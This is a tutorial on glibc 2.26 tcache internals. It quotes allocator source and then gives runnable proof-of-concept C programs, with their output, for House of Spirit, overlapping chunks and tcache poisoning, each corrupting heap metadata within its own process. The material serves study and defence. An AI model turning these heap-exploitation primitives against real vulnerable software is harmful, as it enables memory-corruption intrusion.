# TCACHE exploitation

## Overview

* **libc-2.26**

### TL;DR

* Chunks can end up in the thread caches in multiple ways
  * upon `free`
    * before the fastbin code in `_int_free`, if the chunk has an appropriate size and the corresponding bin isn't full.
  * upon `malloc`
    * if a fast/small chunk is returned, the other chunks from the corresponding bin are used to fill the appropriate tcache bin.
    * in the binning code, exact size matches are first put in the tcache instead of being returned immediately.
* Chunks are taken from the tcache
  * in `__libc_malloc`, before `_int_malloc` is called.
  * after the binning code, if at least one exact match was found.
  * there can also be a limit on the number of chunks that are put in the tcache in a run of the binning code. If that's reached, the last one found is returned. However, this is unlimited by default.
* Some observations
  * the tcache fill code in the fast path of malloc will reverse the order of the chunks.
  * **cached chunks won't be coalesced**, neither when their neighbors are freed nor with the top chunk when they themselves are freed.

### data structure

```C
/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread char tcache_shutting_down = 0;
static __thread tcache_perthread_struct *tcache = NULL;
```

* similar to the fastbins
  * singly linked list
  * LIFO
* ```C
  # define TCACHE_FILL_COUNT 7
  # define TCACHE_MAX_BINS 64
  ```
* There are 64 singly-linked bins per thread by default
  * **chunk sizes from 24 to 1032** (12 to 516 on x86) bytes, in 16 (8) byte increments
  * a single tcache bin contains at most **7 chunks** by default

### operation

```C
/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}
```

### workflow

* **__libc_malloc**

```C
void *
__libc_malloc (size_t bytes)
{
  ...
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes = request2size (bytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
  ...
  victim = _int_malloc (ar_ptr, bytes);
```

* requests are served from the tcache first, **before** `_int_malloc` is ever reached, if the corresponding bin holds a suitable chunk (see the sketch below).
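A minimal sketch (not one of the original fanzine demos) of this fast path, assuming libc-2.26 defaults: both frees land in the same tcache bin, and subsequent same-sized requests are served from its head, so the chunks come back in reverse order of their frees.

```C
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
  void *a = malloc(0x48);
  void *b = malloc(0x48);
  printf("a = %p, b = %p\n", a, b);

  /* Same size class: both chunks go into the same tcache bin,
     with b ending up at the head.  */
  free(a);
  free(b);

  /* __libc_malloc pops from the head of the bin before _int_malloc
     runs, so the order is reversed: first b, then a.  */
  printf("1st malloc(0x48): %p\n", malloc(0x48));
  printf("2nd malloc(0x48): %p\n", malloc(0x48));
  return 0;
}
```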
* **_int_malloc**

```C
static void *
_int_malloc (mstate av, size_t bytes)
{
  ...
#if USE_TCACHE
  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
#endif
  ...
  // fastbin code
#if USE_TCACHE
      /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
      size_t tc_idx = csize2tidx (nb);
      if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks over.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (pp = *fb) != NULL)
            {
              REMOVE_FB (fb, tc_victim, pp);
              if (tc_victim != 0)
                {
                  tcache_put (tc_victim, tc_idx);
                }
            }
        }
#endif
  ...
  // smallbin code
#if USE_TCACHE
      /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
      size_t tc_idx = csize2tidx (nb);
      if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks over.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (tc_victim = last (bin)) != bin)
            {
              if (tc_victim != 0)
                {
                  bck = tc_victim->bk;
                  set_inuse_bit_at_offset (tc_victim, nb);
                  if (av != &main_arena)
                    set_non_main_arena (tc_victim);
                  bin->bk = bck;
                  bck->fd = bin;

                  tcache_put (tc_victim, tc_idx);
                }
            }
        }
#endif
  ...
  // binning code
#if USE_TCACHE
  INTERNAL_SIZE_T tcache_nb = 0;
  size_t tc_idx = csize2tidx (nb);
  if (tcache && tc_idx < mp_.tcache_bins)
    tcache_nb = nb;
  int return_cached = 0;

  tcache_unsorted_count = 0;
#endif
  ...
#if USE_TCACHE
          /* Fill cache first, return to user only if cache fills.
             We may return one of these chunks later.  */
          if (tcache_nb
              && tcache->counts[tc_idx] < mp_.tcache_count)
            {
              tcache_put (victim, tc_idx);
              return_cached = 1;
              continue;
            }
          else
            {
#endif
  ...
#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
         filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
          && mp_.tcache_unsorted_limit > 0
          && tcache_unsorted_count > mp_.tcache_unsorted_limit)
        {
          return tcache_get (tc_idx);
        }
#endif
  ...
#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
        {
          return tcache_get (tc_idx);
        }
#endif
```

* after retrieving a chunk from a fastbin, the allocator moves the remaining chunks of that fastbin (up to the tcache fill count) into the corresponding tcache bin, reversing their order in the process, as shown in the sketch below.

* **_int_free**

```C
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  ...
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif
```
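The interplay of these paths can be observed from an ordinary program. Below is a minimal sketch (not one of the original fanzine demos), assuming libc-2.26 defaults (`TCACHE_FILL_COUNT` of 7) and no interfering allocations in the same size class.

```C
#include <stdio.h>
#include <stdlib.h>

#define N 10

int main(void)
{
  void *p[N];

  /* 0x48 requests stay in fastbin range, so frees beyond the 7-chunk
     tcache limit fall through to the fastbin code in _int_free.  */
  for (int i = 0; i < N; i++)
    p[i] = malloc(0x48);
  for (int i = 0; i < N; i++)
    {
      printf("p[%d] = %p\n", i, p[i]);
      free(p[i]);   /* p[0]..p[6] -> tcache bin, p[7]..p[9] -> fastbin */
    }

  /* The first 7 requests drain the tcache bin in LIFO order
     (p[6]..p[0]).  The 8th reaches the fastbin code in _int_malloc,
     which returns the fastbin head p[9] and stashes p[8], then p[7]
     into the tcache -- reversing their order.  The last two requests
     therefore return p[7], then p[8].  */
  for (int i = 0; i < N; i++)
    printf("malloc #%d: %p\n", i + 1, malloc(0x48));
  return 0;
}
```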
## TCACHE Exploitation

* Performance: **most of the free/malloc code is bypassed for non-large chunk sizes** until the corresponding tcache bins are full.

### The House of Spirit

* powerful
  * **no nextsize check** (the classic fastbin variant requires a sane size field in the chunk following the fake one)
  * now **it works for smallbin sizes**, too
* demo

```C
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

typedef size_t INTERNAL_SIZE_T;

struct malloc_chunk {
  INTERNAL_SIZE_T prev_size;          /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T size;               /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;            /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize;   /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

typedef struct malloc_chunk* mchunkptr;

int main(int argc, const char* argv[])
{
  size_t fake_chunk_and_more[64];

  printf("This example showcases how the House of Spirit became more powerful "
         "after the tcache patch\n");
  printf("Filling space at and after the fake chunk with invalid data\n");
  memset(fake_chunk_and_more, 'A', sizeof(fake_chunk_and_more));
  printf("Building fake chunk on the stack at %p\n", (void *)fake_chunk_and_more);
  mchunkptr fake_chunk = (mchunkptr)(void *)fake_chunk_and_more;
  fake_chunk->size = 0x110;
  void *mem = (void*)((char*)fake_chunk + offsetof(struct malloc_chunk, fd));
  free(mem);
  printf("Passed chunk to free, let's make an allocation for the fake size\n");
  void *mem2 = malloc(0x100);
  printf("malloc(0x100) returned: %p\n", mem2);
  return 0;
}
```

> fanzine/05-tcache/tcache_house_of_spirit
> This example showcases how the House of Spirit became more powerful after the tcache patch
> Filling space at and after the fake chunk with invalid data
> Building fake chunk on the stack at 0x7fff781b50e0
> Passed chunk to free, let's make an allocation for the fake size
> malloc(0x100) returned: 0x7fff781b50f0

### Overlapping chunks

* demo

```C
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

size_t *chunksizep(void *mem)
{
  return (size_t *)(((char *)mem) - sizeof(size_t));
}

int main(int argc, const char* argv[])
{
  printf("This example showcases the possibility to create overlapping chunks "
         "via the tcaching code in _int_free\n");
  void *mem = malloc(0x48);
  void *sentry = malloc(0x18);
  printf("Allocated victim chunk with requested size 0x48 at %p\n", mem);
  printf("Allocated sentry element after victim (not strictly necessary): %p\n", sentry);
  printf("Emulating corruption of the victim's size to 0x110\n");
  *chunksizep(mem) = 0x110;
  free(mem);
  printf("Freed victim chunk to put it in a different tcache bin\n");
  void *mem2 = malloc(0x100);
  printf("Requested a chunk of 0x100 bytes, it is at: %p\n", mem2);
  return 0;
}
```

> fanzine/05-tcache/overlapping_chunks_by_caching
> This example showcases the possibility to create overlapping chunks via the tcaching code in _int_free
> Allocated victim chunk with requested size 0x48 at 0x560e374c4670
> Allocated sentry element after victim (not strictly necessary): 0x560e374c46c0
> Emulating corruption of the victim's size to 0x110
> Freed victim chunk to put it in a different tcache bin
> Requested a chunk of 0x100 bytes, it is at: 0x560e374c4670

### TCACHE poisoning

* similar to the fastbin attack, but more powerful
  * when taking a chunk off a bin, **no size check against the corresponding `fastbin_index` needs to be satisfied**
  * **no double free check against the first member of the bin upon free** (see the sketch below)
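To illustrate the missing double free check, here is a minimal sketch (not one of the original fanzine demos; it relies on libc-2.26 behavior, before later glibc versions added a key-based double free detection to the tcache): freeing the same chunk twice puts it into its tcache bin twice, so two subsequent requests return the same address.

```C
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
  void *p = malloc(0x48);
  printf("Allocated chunk at %p\n", p);

  /* tcache_put neither compares the chunk against the bin head (as
     the fastbin code in _int_free does) nor walks the list, so a
     straight double free goes through unnoticed.  */
  free(p);
  free(p);

  /* The bin now contains p twice, so malloc hands out the same
     chunk twice.  */
  printf("1st malloc(0x48): %p\n", malloc(0x48));
  printf("2nd malloc(0x48): %p\n", malloc(0x48));
  return 0;
}
```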
bin\\n"); printf("Emulating corruption of the next ptr of victim (while also " \ "corrupting its size for good measure)\\n"); *chunksizep(mem) = 0x41414141; victim->next = (void *)target; printf("Now we need to make two requests for the appropriate size " \ "so that malloc returns a chunk overlapping our target\\n"); void *mem1 = malloc(0x48); void *mem2 = malloc(0x48); printf("The first malloc(0x48) returned %p, the second one: %p\\n", mem1, mem2); return 0; } ``` > fanzine/05-tcache/tcache_poisoning > This example showcases tcache poisoning by forcing malloc to return an arbitrary chunk after the corruption of a tcache_entry > Our target is a stack region at 0x7fff0faa62c0 > Allocated victim chunk with requested size 0x48 at 0x55f6a8fb9670 > Freed victim chunk to put it in a tcache bin > Emulating corruption of the next ptr of victim (while also corrupting its size for good measure) > Now we need to make two requests for the appropriate size so that malloc returns a chunk overlapping our target > The first malloc(0x48) returned 0x55f6a8fb9670, the second one: 0x7fff0faa62c0 ## ref [Extra Heap Exploitation 2: TCache and Potential Exploitation](https://dangokyo.me/2018/01/16/extra-heap-exploitation-tcache-and-potential-exploitation/) [ptmalloc fanzine - episode 05: thread local caching in glibc malloc](http://tukan.farm/2017/07/08/tcache/)